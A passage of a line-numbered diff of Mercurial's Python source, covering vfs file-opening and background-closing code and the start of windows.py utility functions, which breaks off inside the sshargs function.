276 to ``__call__``/``open`` to result in the file possibly being closed
276 to ``__call__``/``open`` to result in the file possibly being closed
277 asynchronously, on a background thread.
277 asynchronously, on a background thread.
278 """
278 """
279 # This is an arbitrary restriction and could be changed if we ever
279 # This is an arbitrary restriction and could be changed if we ever
280 # have a use case.
280 # have a use case.
281 vfs = getattr(self, 'vfs', self)
281 vfs = getattr(self, 'vfs', self)
282 if getattr(vfs, '_backgroundfilecloser', None):
282 if getattr(vfs, '_backgroundfilecloser', None):
283 raise error.Abort(
283 raise error.Abort(
284 _('can only have 1 active background file closer'))
284 _('can only have 1 active background file closer'))
285
285
286 with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
286 with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
287 try:
287 try:
288 vfs._backgroundfilecloser = bfc
288 vfs._backgroundfilecloser = bfc
289 yield bfc
289 yield bfc
290 finally:
290 finally:
291 vfs._backgroundfilecloser = None
291 vfs._backgroundfilecloser = None
292
292
293 class vfs(abstractvfs):
293 class vfs(abstractvfs):
294 '''Operate files relative to a base directory
294 '''Operate files relative to a base directory
295
295
296 This class is used to hide the details of COW semantics and
296 This class is used to hide the details of COW semantics and
297 remote file access from higher level code.
297 remote file access from higher level code.
298
299 'cacheaudited' should be enabled only if (a) vfs object is short-lived, or
300 (b) the base directory is managed by hg and considered sort-of append-only.
301 See pathutil.pathauditor() for details.
298 '''
302 '''
299 def __init__(self, base, audit=True, expandpath=False, realpath=False):
303 def __init__(self, base, audit=True, cacheaudited=False, expandpath=False,
304 realpath=False):
300 if expandpath:
305 if expandpath:
301 base = util.expandpath(base)
306 base = util.expandpath(base)
302 if realpath:
307 if realpath:
303 base = os.path.realpath(base)
308 base = os.path.realpath(base)
304 self.base = base
309 self.base = base
305 self._audit = audit
310 self._audit = audit
306 if audit:
311 if audit:
307 self.audit = pathutil.pathauditor(self.base)
312 self.audit = pathutil.pathauditor(self.base, cached=cacheaudited)
308 else:
313 else:
309 self.audit = (lambda path, mode=None: True)
314 self.audit = (lambda path, mode=None: True)
310 self.createmode = None
315 self.createmode = None
311 self._trustnlink = None
316 self._trustnlink = None
312
317
313 @util.propertycache
318 @util.propertycache
314 def _cansymlink(self):
319 def _cansymlink(self):
315 return util.checklink(self.base)
320 return util.checklink(self.base)
316
321
317 @util.propertycache
322 @util.propertycache
318 def _chmod(self):
323 def _chmod(self):
319 return util.checkexec(self.base)
324 return util.checkexec(self.base)
320
325
321 def _fixfilemode(self, name):
326 def _fixfilemode(self, name):
322 if self.createmode is None or not self._chmod:
327 if self.createmode is None or not self._chmod:
323 return
328 return
324 os.chmod(name, self.createmode & 0o666)
329 os.chmod(name, self.createmode & 0o666)
325
330
326 def __call__(self, path, mode="r", text=False, atomictemp=False,
331 def __call__(self, path, mode="r", text=False, atomictemp=False,
327 notindexed=False, backgroundclose=False, checkambig=False,
332 notindexed=False, backgroundclose=False, checkambig=False,
328 auditpath=True):
333 auditpath=True):
329 '''Open ``path`` file, which is relative to vfs root.
334 '''Open ``path`` file, which is relative to vfs root.
330
335
331 Newly created directories are marked as "not to be indexed by
336 Newly created directories are marked as "not to be indexed by
332 the content indexing service", if ``notindexed`` is specified
337 the content indexing service", if ``notindexed`` is specified
333 for "write" mode access.
338 for "write" mode access.
334
339
335 If ``backgroundclose`` is passed, the file may be closed asynchronously.
340 If ``backgroundclose`` is passed, the file may be closed asynchronously.
336 It can only be used if the ``self.backgroundclosing()`` context manager
341 It can only be used if the ``self.backgroundclosing()`` context manager
337 is active. This should only be specified if the following criteria hold:
342 is active. This should only be specified if the following criteria hold:
338
343
339 1. There is a potential for writing thousands of files. Unless you
344 1. There is a potential for writing thousands of files. Unless you
340 are writing thousands of files, the performance benefits of
345 are writing thousands of files, the performance benefits of
341 asynchronously closing files is not realized.
346 asynchronously closing files is not realized.
342 2. Files are opened exactly once for the ``backgroundclosing``
347 2. Files are opened exactly once for the ``backgroundclosing``
343 active duration and are therefore free of race conditions between
348 active duration and are therefore free of race conditions between
344 closing a file on a background thread and reopening it. (If the
349 closing a file on a background thread and reopening it. (If the
345 file were opened multiple times, there could be unflushed data
350 file were opened multiple times, there could be unflushed data
346 because the original file handle hasn't been flushed/closed yet.)
351 because the original file handle hasn't been flushed/closed yet.)
347
352
348 ``checkambig`` argument is passed to atomictemplfile (valid
353 ``checkambig`` argument is passed to atomictemplfile (valid
349 only for writing), and is useful only if target file is
354 only for writing), and is useful only if target file is
350 guarded by any lock (e.g. repo.lock or repo.wlock).
355 guarded by any lock (e.g. repo.lock or repo.wlock).
351
356
352 To avoid file stat ambiguity forcibly, checkambig=True involves
357 To avoid file stat ambiguity forcibly, checkambig=True involves
353 copying ``path`` file opened in "append" mode (e.g. for
358 copying ``path`` file opened in "append" mode (e.g. for
354 truncation), if it is owned by another. Therefore, use
359 truncation), if it is owned by another. Therefore, use
355 combination of append mode and checkambig=True only in limited
360 combination of append mode and checkambig=True only in limited
356 cases (see also issue5418 and issue5584 for detail).
361 cases (see also issue5418 and issue5584 for detail).
357 '''
362 '''
358 if auditpath:
363 if auditpath:
359 if self._audit:
364 if self._audit:
360 r = util.checkosfilename(path)
365 r = util.checkosfilename(path)
361 if r:
366 if r:
362 raise error.Abort("%s: %r" % (r, path))
367 raise error.Abort("%s: %r" % (r, path))
363 self.audit(path, mode=mode)
368 self.audit(path, mode=mode)
364 f = self.join(path)
369 f = self.join(path)
365
370
366 if not text and "b" not in mode:
371 if not text and "b" not in mode:
367 mode += "b" # for that other OS
372 mode += "b" # for that other OS
368
373
369 nlink = -1
374 nlink = -1
370 if mode not in ('r', 'rb'):
375 if mode not in ('r', 'rb'):
371 dirname, basename = util.split(f)
376 dirname, basename = util.split(f)
372 # If basename is empty, then the path is malformed because it points
377 # If basename is empty, then the path is malformed because it points
373 # to a directory. Let the posixfile() call below raise IOError.
378 # to a directory. Let the posixfile() call below raise IOError.
374 if basename:
379 if basename:
375 if atomictemp:
380 if atomictemp:
376 util.makedirs(dirname, self.createmode, notindexed)
381 util.makedirs(dirname, self.createmode, notindexed)
377 return util.atomictempfile(f, mode, self.createmode,
382 return util.atomictempfile(f, mode, self.createmode,
378 checkambig=checkambig)
383 checkambig=checkambig)
379 try:
384 try:
380 if 'w' in mode:
385 if 'w' in mode:
381 util.unlink(f)
386 util.unlink(f)
382 nlink = 0
387 nlink = 0
383 else:
388 else:
384 # nlinks() may behave differently for files on Windows
389 # nlinks() may behave differently for files on Windows
385 # shares if the file is open.
390 # shares if the file is open.
386 with util.posixfile(f):
391 with util.posixfile(f):
387 nlink = util.nlinks(f)
392 nlink = util.nlinks(f)
388 if nlink < 1:
393 if nlink < 1:
389 nlink = 2 # force mktempcopy (issue1922)
394 nlink = 2 # force mktempcopy (issue1922)
390 except (OSError, IOError) as e:
395 except (OSError, IOError) as e:
391 if e.errno != errno.ENOENT:
396 if e.errno != errno.ENOENT:
392 raise
397 raise
393 nlink = 0
398 nlink = 0
394 util.makedirs(dirname, self.createmode, notindexed)
399 util.makedirs(dirname, self.createmode, notindexed)
395 if nlink > 0:
400 if nlink > 0:
396 if self._trustnlink is None:
401 if self._trustnlink is None:
397 self._trustnlink = nlink > 1 or util.checknlink(f)
402 self._trustnlink = nlink > 1 or util.checknlink(f)
398 if nlink > 1 or not self._trustnlink:
403 if nlink > 1 or not self._trustnlink:
399 util.rename(util.mktempcopy(f), f)
404 util.rename(util.mktempcopy(f), f)
400 fp = util.posixfile(f, mode)
405 fp = util.posixfile(f, mode)
401 if nlink == 0:
406 if nlink == 0:
402 self._fixfilemode(f)
407 self._fixfilemode(f)
403
408
404 if checkambig:
409 if checkambig:
405 if mode in ('r', 'rb'):
410 if mode in ('r', 'rb'):
406 raise error.Abort(_('implementation error: mode %s is not'
411 raise error.Abort(_('implementation error: mode %s is not'
407 ' valid for checkambig=True') % mode)
412 ' valid for checkambig=True') % mode)
408 fp = checkambigatclosing(fp)
413 fp = checkambigatclosing(fp)
409
414
410 if backgroundclose:
415 if backgroundclose:
411 if not self._backgroundfilecloser:
416 if not self._backgroundfilecloser:
412 raise error.Abort(_('backgroundclose can only be used when a '
417 raise error.Abort(_('backgroundclose can only be used when a '
413 'backgroundclosing context manager is active')
418 'backgroundclosing context manager is active')
414 )
419 )
415
420
416 fp = delayclosedfile(fp, self._backgroundfilecloser)
421 fp = delayclosedfile(fp, self._backgroundfilecloser)
417
422
418 return fp
423 return fp
419
424
420 def symlink(self, src, dst):
425 def symlink(self, src, dst):
421 self.audit(dst)
426 self.audit(dst)
422 linkname = self.join(dst)
427 linkname = self.join(dst)
423 util.tryunlink(linkname)
428 util.tryunlink(linkname)
424
429
425 util.makedirs(os.path.dirname(linkname), self.createmode)
430 util.makedirs(os.path.dirname(linkname), self.createmode)
426
431
427 if self._cansymlink:
432 if self._cansymlink:
428 try:
433 try:
429 os.symlink(src, linkname)
434 os.symlink(src, linkname)
430 except OSError as err:
435 except OSError as err:
431 raise OSError(err.errno, _('could not symlink to %r: %s') %
436 raise OSError(err.errno, _('could not symlink to %r: %s') %
432 (src, err.strerror), linkname)
437 (src, err.strerror), linkname)
433 else:
438 else:
434 self.write(dst, src)
439 self.write(dst, src)
435
440
436 def join(self, path, *insidef):
441 def join(self, path, *insidef):
437 if path:
442 if path:
438 return os.path.join(self.base, path, *insidef)
443 return os.path.join(self.base, path, *insidef)
439 else:
444 else:
440 return self.base
445 return self.base
441
446
442 opener = vfs
447 opener = vfs
443
448
444 class proxyvfs(object):
449 class proxyvfs(object):
445 def __init__(self, vfs):
450 def __init__(self, vfs):
446 self.vfs = vfs
451 self.vfs = vfs
447
452
448 @property
453 @property
449 def options(self):
454 def options(self):
450 return self.vfs.options
455 return self.vfs.options
451
456
452 @options.setter
457 @options.setter
453 def options(self, value):
458 def options(self, value):
454 self.vfs.options = value
459 self.vfs.options = value
455
460
456 class filtervfs(abstractvfs, proxyvfs):
461 class filtervfs(abstractvfs, proxyvfs):
457 '''Wrapper vfs for filtering filenames with a function.'''
462 '''Wrapper vfs for filtering filenames with a function.'''
458
463
459 def __init__(self, vfs, filter):
464 def __init__(self, vfs, filter):
460 proxyvfs.__init__(self, vfs)
465 proxyvfs.__init__(self, vfs)
461 self._filter = filter
466 self._filter = filter
462
467
463 def __call__(self, path, *args, **kwargs):
468 def __call__(self, path, *args, **kwargs):
464 return self.vfs(self._filter(path), *args, **kwargs)
469 return self.vfs(self._filter(path), *args, **kwargs)
465
470
466 def join(self, path, *insidef):
471 def join(self, path, *insidef):
467 if path:
472 if path:
468 return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
473 return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
469 else:
474 else:
470 return self.vfs.join(path)
475 return self.vfs.join(path)
471
476
472 filteropener = filtervfs
477 filteropener = filtervfs
473
478
474 class readonlyvfs(abstractvfs, proxyvfs):
479 class readonlyvfs(abstractvfs, proxyvfs):
475 '''Wrapper vfs preventing any writing.'''
480 '''Wrapper vfs preventing any writing.'''
476
481
477 def __init__(self, vfs):
482 def __init__(self, vfs):
478 proxyvfs.__init__(self, vfs)
483 proxyvfs.__init__(self, vfs)
479
484
480 def __call__(self, path, mode='r', *args, **kw):
485 def __call__(self, path, mode='r', *args, **kw):
481 if mode not in ('r', 'rb'):
486 if mode not in ('r', 'rb'):
482 raise error.Abort(_('this vfs is read only'))
487 raise error.Abort(_('this vfs is read only'))
483 return self.vfs(path, mode, *args, **kw)
488 return self.vfs(path, mode, *args, **kw)
484
489
485 def join(self, path, *insidef):
490 def join(self, path, *insidef):
486 return self.vfs.join(path, *insidef)
491 return self.vfs.join(path, *insidef)
487
492
488 class closewrapbase(object):
493 class closewrapbase(object):
489 """Base class of wrapper, which hooks closing
494 """Base class of wrapper, which hooks closing
490
495
491 Do not instantiate outside of the vfs layer.
496 Do not instantiate outside of the vfs layer.
492 """
497 """
493 def __init__(self, fh):
498 def __init__(self, fh):
494 object.__setattr__(self, r'_origfh', fh)
499 object.__setattr__(self, r'_origfh', fh)
495
500
496 def __getattr__(self, attr):
501 def __getattr__(self, attr):
497 return getattr(self._origfh, attr)
502 return getattr(self._origfh, attr)
498
503
499 def __setattr__(self, attr, value):
504 def __setattr__(self, attr, value):
500 return setattr(self._origfh, attr, value)
505 return setattr(self._origfh, attr, value)
501
506
502 def __delattr__(self, attr):
507 def __delattr__(self, attr):
503 return delattr(self._origfh, attr)
508 return delattr(self._origfh, attr)
504
509
505 def __enter__(self):
510 def __enter__(self):
506 return self._origfh.__enter__()
511 return self._origfh.__enter__()
507
512
508 def __exit__(self, exc_type, exc_value, exc_tb):
513 def __exit__(self, exc_type, exc_value, exc_tb):
509 raise NotImplementedError('attempted instantiating ' + str(type(self)))
514 raise NotImplementedError('attempted instantiating ' + str(type(self)))
510
515
511 def close(self):
516 def close(self):
512 raise NotImplementedError('attempted instantiating ' + str(type(self)))
517 raise NotImplementedError('attempted instantiating ' + str(type(self)))
513
518
514 class delayclosedfile(closewrapbase):
519 class delayclosedfile(closewrapbase):
515 """Proxy for a file object whose close is delayed.
520 """Proxy for a file object whose close is delayed.
516
521
517 Do not instantiate outside of the vfs layer.
522 Do not instantiate outside of the vfs layer.
518 """
523 """
519 def __init__(self, fh, closer):
524 def __init__(self, fh, closer):
520 super(delayclosedfile, self).__init__(fh)
525 super(delayclosedfile, self).__init__(fh)
521 object.__setattr__(self, r'_closer', closer)
526 object.__setattr__(self, r'_closer', closer)
522
527
523 def __exit__(self, exc_type, exc_value, exc_tb):
528 def __exit__(self, exc_type, exc_value, exc_tb):
524 self._closer.close(self._origfh)
529 self._closer.close(self._origfh)
525
530
526 def close(self):
531 def close(self):
527 self._closer.close(self._origfh)
532 self._closer.close(self._origfh)
528
533
529 class backgroundfilecloser(object):
534 class backgroundfilecloser(object):
530 """Coordinates background closing of file handles on multiple threads."""
535 """Coordinates background closing of file handles on multiple threads."""
531 def __init__(self, ui, expectedcount=-1):
536 def __init__(self, ui, expectedcount=-1):
532 self._running = False
537 self._running = False
533 self._entered = False
538 self._entered = False
534 self._threads = []
539 self._threads = []
535 self._threadexception = None
540 self._threadexception = None
536
541
537 # Only Windows/NTFS has slow file closing. So only enable by default
542 # Only Windows/NTFS has slow file closing. So only enable by default
538 # on that platform. But allow to be enabled elsewhere for testing.
543 # on that platform. But allow to be enabled elsewhere for testing.
539 defaultenabled = pycompat.osname == 'nt'
544 defaultenabled = pycompat.osname == 'nt'
540 enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)
545 enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)
541
546
542 if not enabled:
547 if not enabled:
543 return
548 return
544
549
545 # There is overhead to starting and stopping the background threads.
550 # There is overhead to starting and stopping the background threads.
546 # Don't do background processing unless the file count is large enough
551 # Don't do background processing unless the file count is large enough
547 # to justify it.
552 # to justify it.
548 minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
553 minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
549 # FUTURE dynamically start background threads after minfilecount closes.
554 # FUTURE dynamically start background threads after minfilecount closes.
550 # (We don't currently have any callers that don't know their file count)
555 # (We don't currently have any callers that don't know their file count)
551 if expectedcount > 0 and expectedcount < minfilecount:
556 if expectedcount > 0 and expectedcount < minfilecount:
552 return
557 return
553
558
554 maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
559 maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
555 threadcount = ui.configint('worker', 'backgroundclosethreadcount')
560 threadcount = ui.configint('worker', 'backgroundclosethreadcount')
556
561
557 ui.debug('starting %d threads for background file closing\n' %
562 ui.debug('starting %d threads for background file closing\n' %
558 threadcount)
563 threadcount)
559
564
560 self._queue = util.queue(maxsize=maxqueue)
565 self._queue = util.queue(maxsize=maxqueue)
561 self._running = True
566 self._running = True
562
567
563 for i in range(threadcount):
568 for i in range(threadcount):
564 t = threading.Thread(target=self._worker, name='backgroundcloser')
569 t = threading.Thread(target=self._worker, name='backgroundcloser')
565 self._threads.append(t)
570 self._threads.append(t)
566 t.start()
571 t.start()
567
572
568 def __enter__(self):
573 def __enter__(self):
569 self._entered = True
574 self._entered = True
570 return self
575 return self
571
576
572 def __exit__(self, exc_type, exc_value, exc_tb):
577 def __exit__(self, exc_type, exc_value, exc_tb):
573 self._running = False
578 self._running = False
574
579
575 # Wait for threads to finish closing so open files don't linger for
580 # Wait for threads to finish closing so open files don't linger for
576 # longer than lifetime of context manager.
581 # longer than lifetime of context manager.
577 for t in self._threads:
582 for t in self._threads:
578 t.join()
583 t.join()
579
584
580 def _worker(self):
585 def _worker(self):
581 """Main routine for worker thread."""
586 """Main routine for worker thread."""
582 while True:
587 while True:
583 try:
588 try:
584 fh = self._queue.get(block=True, timeout=0.100)
589 fh = self._queue.get(block=True, timeout=0.100)
585 # Need to catch or the thread will terminate and
590 # Need to catch or the thread will terminate and
586 # we could orphan file descriptors.
591 # we could orphan file descriptors.
587 try:
592 try:
588 fh.close()
593 fh.close()
589 except Exception as e:
594 except Exception as e:
590 # Stash so can re-raise from main thread later.
595 # Stash so can re-raise from main thread later.
591 self._threadexception = e
596 self._threadexception = e
592 except util.empty:
597 except util.empty:
593 if not self._running:
598 if not self._running:
594 break
599 break
595
600
596 def close(self, fh):
601 def close(self, fh):
597 """Schedule a file for closing."""
602 """Schedule a file for closing."""
598 if not self._entered:
603 if not self._entered:
599 raise error.Abort(_('can only call close() when context manager '
604 raise error.Abort(_('can only call close() when context manager '
600 'active'))
605 'active'))
601
606
602 # If a background thread encountered an exception, raise now so we fail
607 # If a background thread encountered an exception, raise now so we fail
603 # fast. Otherwise we may potentially go on for minutes until the error
608 # fast. Otherwise we may potentially go on for minutes until the error
604 # is acted on.
609 # is acted on.
605 if self._threadexception:
610 if self._threadexception:
606 e = self._threadexception
611 e = self._threadexception
607 self._threadexception = None
612 self._threadexception = None
608 raise e
613 raise e
609
614
610 # If we're not actively running, close synchronously.
615 # If we're not actively running, close synchronously.
611 if not self._running:
616 if not self._running:
612 fh.close()
617 fh.close()
613 return
618 return
614
619
615 self._queue.put(fh, block=True, timeout=None)
620 self._queue.put(fh, block=True, timeout=None)
616
621
617 class checkambigatclosing(closewrapbase):
622 class checkambigatclosing(closewrapbase):
618 """Proxy for a file object, to avoid ambiguity of file stat
623 """Proxy for a file object, to avoid ambiguity of file stat
619
624
620 See also util.filestat for detail about "ambiguity of file stat".
625 See also util.filestat for detail about "ambiguity of file stat".
621
626
622 This proxy is useful only if the target file is guarded by any
627 This proxy is useful only if the target file is guarded by any
623 lock (e.g. repo.lock or repo.wlock)
628 lock (e.g. repo.lock or repo.wlock)
624
629
625 Do not instantiate outside of the vfs layer.
630 Do not instantiate outside of the vfs layer.
626 """
631 """
627 def __init__(self, fh):
632 def __init__(self, fh):
628 super(checkambigatclosing, self).__init__(fh)
633 super(checkambigatclosing, self).__init__(fh)
629 object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))
634 object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))
630
635
631 def _checkambig(self):
636 def _checkambig(self):
632 oldstat = self._oldstat
637 oldstat = self._oldstat
633 if oldstat.stat:
638 if oldstat.stat:
634 _avoidambig(self._origfh.name, oldstat)
639 _avoidambig(self._origfh.name, oldstat)
635
640
636 def __exit__(self, exc_type, exc_value, exc_tb):
641 def __exit__(self, exc_type, exc_value, exc_tb):
637 self._origfh.__exit__(exc_type, exc_value, exc_tb)
642 self._origfh.__exit__(exc_type, exc_value, exc_tb)
638 self._checkambig()
643 self._checkambig()
639
644
640 def close(self):
645 def close(self):
641 self._origfh.close()
646 self._origfh.close()
642 self._checkambig()
647 self._checkambig()
@@ -1,476 +1,484 b''
1 # windows.py - Windows utility function implementations for Mercurial
1 # windows.py - Windows utility function implementations for Mercurial
2 #
2 #
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
3 # Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import msvcrt
11 import msvcrt
12 import os
12 import os
13 import re
13 import re
14 import stat
14 import stat
15 import sys
15 import sys
16
16
17 from .i18n import _
17 from .i18n import _
18 from . import (
18 from . import (
19 encoding,
19 encoding,
20 error,
20 policy,
21 policy,
21 pycompat,
22 pycompat,
22 win32,
23 win32,
23 )
24 )
24
25
25 try:
26 try:
26 import _winreg as winreg
27 import _winreg as winreg
27 winreg.CloseKey
28 winreg.CloseKey
28 except ImportError:
29 except ImportError:
29 import winreg
30 import winreg
30
31
31 osutil = policy.importmod(r'osutil')
32 osutil = policy.importmod(r'osutil')
32
33
33 executablepath = win32.executablepath
34 executablepath = win32.executablepath
34 getuser = win32.getuser
35 getuser = win32.getuser
35 hidewindow = win32.hidewindow
36 hidewindow = win32.hidewindow
36 makedir = win32.makedir
37 makedir = win32.makedir
37 nlinks = win32.nlinks
38 nlinks = win32.nlinks
38 oslink = win32.oslink
39 oslink = win32.oslink
39 samedevice = win32.samedevice
40 samedevice = win32.samedevice
40 samefile = win32.samefile
41 samefile = win32.samefile
41 setsignalhandler = win32.setsignalhandler
42 setsignalhandler = win32.setsignalhandler
42 spawndetached = win32.spawndetached
43 spawndetached = win32.spawndetached
43 split = os.path.split
44 split = os.path.split
44 testpid = win32.testpid
45 testpid = win32.testpid
45 unlink = win32.unlink
46 unlink = win32.unlink
46
47
47 umask = 0o022
48 umask = 0o022
48
49
49 class mixedfilemodewrapper(object):
50 class mixedfilemodewrapper(object):
50 """Wraps a file handle when it is opened in read/write mode.
51 """Wraps a file handle when it is opened in read/write mode.
51
52
52 fopen() and fdopen() on Windows have a specific-to-Windows requirement
53 fopen() and fdopen() on Windows have a specific-to-Windows requirement
53 that files opened with mode r+, w+, or a+ make a call to a file positioning
54 that files opened with mode r+, w+, or a+ make a call to a file positioning
54 function when switching between reads and writes. Without this extra call,
55 function when switching between reads and writes. Without this extra call,
55 Python will raise a not very intuitive "IOError: [Errno 0] Error."
56 Python will raise a not very intuitive "IOError: [Errno 0] Error."
56
57
57 This class wraps posixfile instances when the file is opened in read/write
58 This class wraps posixfile instances when the file is opened in read/write
58 mode and automatically adds checks or inserts appropriate file positioning
59 mode and automatically adds checks or inserts appropriate file positioning
59 calls when necessary.
60 calls when necessary.
60 """
61 """
61 OPNONE = 0
62 OPNONE = 0
62 OPREAD = 1
63 OPREAD = 1
63 OPWRITE = 2
64 OPWRITE = 2
64
65
65 def __init__(self, fp):
66 def __init__(self, fp):
66 object.__setattr__(self, r'_fp', fp)
67 object.__setattr__(self, r'_fp', fp)
67 object.__setattr__(self, r'_lastop', 0)
68 object.__setattr__(self, r'_lastop', 0)
68
69
69 def __enter__(self):
70 def __enter__(self):
70 return self._fp.__enter__()
71 return self._fp.__enter__()
71
72
72 def __exit__(self, exc_type, exc_val, exc_tb):
73 def __exit__(self, exc_type, exc_val, exc_tb):
73 self._fp.__exit__(exc_type, exc_val, exc_tb)
74 self._fp.__exit__(exc_type, exc_val, exc_tb)
74
75
75 def __getattr__(self, name):
76 def __getattr__(self, name):
76 return getattr(self._fp, name)
77 return getattr(self._fp, name)
77
78
78 def __setattr__(self, name, value):
79 def __setattr__(self, name, value):
79 return self._fp.__setattr__(name, value)
80 return self._fp.__setattr__(name, value)
80
81
81 def _noopseek(self):
82 def _noopseek(self):
82 self._fp.seek(0, os.SEEK_CUR)
83 self._fp.seek(0, os.SEEK_CUR)
83
84
84 def seek(self, *args, **kwargs):
85 def seek(self, *args, **kwargs):
85 object.__setattr__(self, r'_lastop', self.OPNONE)
86 object.__setattr__(self, r'_lastop', self.OPNONE)
86 return self._fp.seek(*args, **kwargs)
87 return self._fp.seek(*args, **kwargs)
87
88
88 def write(self, d):
89 def write(self, d):
89 if self._lastop == self.OPREAD:
90 if self._lastop == self.OPREAD:
90 self._noopseek()
91 self._noopseek()
91
92
92 object.__setattr__(self, r'_lastop', self.OPWRITE)
93 object.__setattr__(self, r'_lastop', self.OPWRITE)
93 return self._fp.write(d)
94 return self._fp.write(d)
94
95
95 def writelines(self, *args, **kwargs):
96 def writelines(self, *args, **kwargs):
96 if self._lastop == self.OPREAD:
97 if self._lastop == self.OPREAD:
97 self._noopeseek()
98 self._noopeseek()
98
99
99 object.__setattr__(self, r'_lastop', self.OPWRITE)
100 object.__setattr__(self, r'_lastop', self.OPWRITE)
100 return self._fp.writelines(*args, **kwargs)
101 return self._fp.writelines(*args, **kwargs)
101
102
102 def read(self, *args, **kwargs):
103 def read(self, *args, **kwargs):
103 if self._lastop == self.OPWRITE:
104 if self._lastop == self.OPWRITE:
104 self._noopseek()
105 self._noopseek()
105
106
106 object.__setattr__(self, r'_lastop', self.OPREAD)
107 object.__setattr__(self, r'_lastop', self.OPREAD)
107 return self._fp.read(*args, **kwargs)
108 return self._fp.read(*args, **kwargs)
108
109
109 def readline(self, *args, **kwargs):
110 def readline(self, *args, **kwargs):
110 if self._lastop == self.OPWRITE:
111 if self._lastop == self.OPWRITE:
111 self._noopseek()
112 self._noopseek()
112
113
113 object.__setattr__(self, r'_lastop', self.OPREAD)
114 object.__setattr__(self, r'_lastop', self.OPREAD)
114 return self._fp.readline(*args, **kwargs)
115 return self._fp.readline(*args, **kwargs)
115
116
116 def readlines(self, *args, **kwargs):
117 def readlines(self, *args, **kwargs):
117 if self._lastop == self.OPWRITE:
118 if self._lastop == self.OPWRITE:
118 self._noopseek()
119 self._noopseek()
119
120
120 object.__setattr__(self, r'_lastop', self.OPREAD)
121 object.__setattr__(self, r'_lastop', self.OPREAD)
121 return self._fp.readlines(*args, **kwargs)
122 return self._fp.readlines(*args, **kwargs)
122
123
123 def posixfile(name, mode='r', buffering=-1):
124 def posixfile(name, mode='r', buffering=-1):
124 '''Open a file with even more POSIX-like semantics'''
125 '''Open a file with even more POSIX-like semantics'''
125 try:
126 try:
126 fp = osutil.posixfile(name, mode, buffering) # may raise WindowsError
127 fp = osutil.posixfile(name, mode, buffering) # may raise WindowsError
127
128
128 # The position when opening in append mode is implementation defined, so
129 # The position when opening in append mode is implementation defined, so
129 # make it consistent with other platforms, which position at EOF.
130 # make it consistent with other platforms, which position at EOF.
130 if 'a' in mode:
131 if 'a' in mode:
131 fp.seek(0, os.SEEK_END)
132 fp.seek(0, os.SEEK_END)
132
133
133 if '+' in mode:
134 if '+' in mode:
134 return mixedfilemodewrapper(fp)
135 return mixedfilemodewrapper(fp)
135
136
136 return fp
137 return fp
137 except WindowsError as err:
138 except WindowsError as err:
138 # convert to a friendlier exception
139 # convert to a friendlier exception
139 raise IOError(err.errno, '%s: %s' % (name, err.strerror))
140 raise IOError(err.errno, '%s: %s' % (name, err.strerror))
140
141
141 # may be wrapped by win32mbcs extension
142 # may be wrapped by win32mbcs extension
142 listdir = osutil.listdir
143 listdir = osutil.listdir
143
144
144 class winstdout(object):
145 class winstdout(object):
145 '''stdout on windows misbehaves if sent through a pipe'''
146 '''stdout on windows misbehaves if sent through a pipe'''
146
147
147 def __init__(self, fp):
148 def __init__(self, fp):
148 self.fp = fp
149 self.fp = fp
149
150
150 def __getattr__(self, key):
151 def __getattr__(self, key):
151 return getattr(self.fp, key)
152 return getattr(self.fp, key)
152
153
153 def close(self):
154 def close(self):
154 try:
155 try:
155 self.fp.close()
156 self.fp.close()
156 except IOError:
157 except IOError:
157 pass
158 pass
158
159
159 def write(self, s):
160 def write(self, s):
160 try:
161 try:
161 # This is workaround for "Not enough space" error on
162 # This is workaround for "Not enough space" error on
162 # writing large size of data to console.
163 # writing large size of data to console.
163 limit = 16000
164 limit = 16000
164 l = len(s)
165 l = len(s)
165 start = 0
166 start = 0
166 self.softspace = 0
167 self.softspace = 0
167 while start < l:
168 while start < l:
168 end = start + limit
169 end = start + limit
169 self.fp.write(s[start:end])
170 self.fp.write(s[start:end])
170 start = end
171 start = end
171 except IOError as inst:
172 except IOError as inst:
172 if inst.errno != 0:
173 if inst.errno != 0:
173 raise
174 raise
174 self.close()
175 self.close()
175 raise IOError(errno.EPIPE, 'Broken pipe')
176 raise IOError(errno.EPIPE, 'Broken pipe')
176
177
177 def flush(self):
178 def flush(self):
178 try:
179 try:
179 return self.fp.flush()
180 return self.fp.flush()
180 except IOError as inst:
181 except IOError as inst:
181 if inst.errno != errno.EINVAL:
182 if inst.errno != errno.EINVAL:
182 raise
183 raise
183 raise IOError(errno.EPIPE, 'Broken pipe')
184 raise IOError(errno.EPIPE, 'Broken pipe')
184
185
185 def _is_win_9x():
186 def _is_win_9x():
186 '''return true if run on windows 95, 98 or me.'''
187 '''return true if run on windows 95, 98 or me.'''
187 try:
188 try:
188 return sys.getwindowsversion()[3] == 1
189 return sys.getwindowsversion()[3] == 1
189 except AttributeError:
190 except AttributeError:
190 return 'command' in encoding.environ.get('comspec', '')
191 return 'command' in encoding.environ.get('comspec', '')
191
192
192 def openhardlinks():
193 def openhardlinks():
193 return not _is_win_9x()
194 return not _is_win_9x()
194
195
195 def parsepatchoutput(output_line):
196 def parsepatchoutput(output_line):
196 """parses the output produced by patch and returns the filename"""
197 """parses the output produced by patch and returns the filename"""
197 pf = output_line[14:]
198 pf = output_line[14:]
198 if pf[0] == '`':
199 if pf[0] == '`':
199 pf = pf[1:-1] # Remove the quotes
200 pf = pf[1:-1] # Remove the quotes
200 return pf
201 return pf
201
202
202 def sshargs(sshcmd, host, user, port):
203 def sshargs(sshcmd, host, user, port):
203 '''Build argument list for ssh or Plink'''
204 '''Build argument list for ssh or Plink'''
204 pflag = 'plink' in sshcmd.lower() and '-P' or '-p'
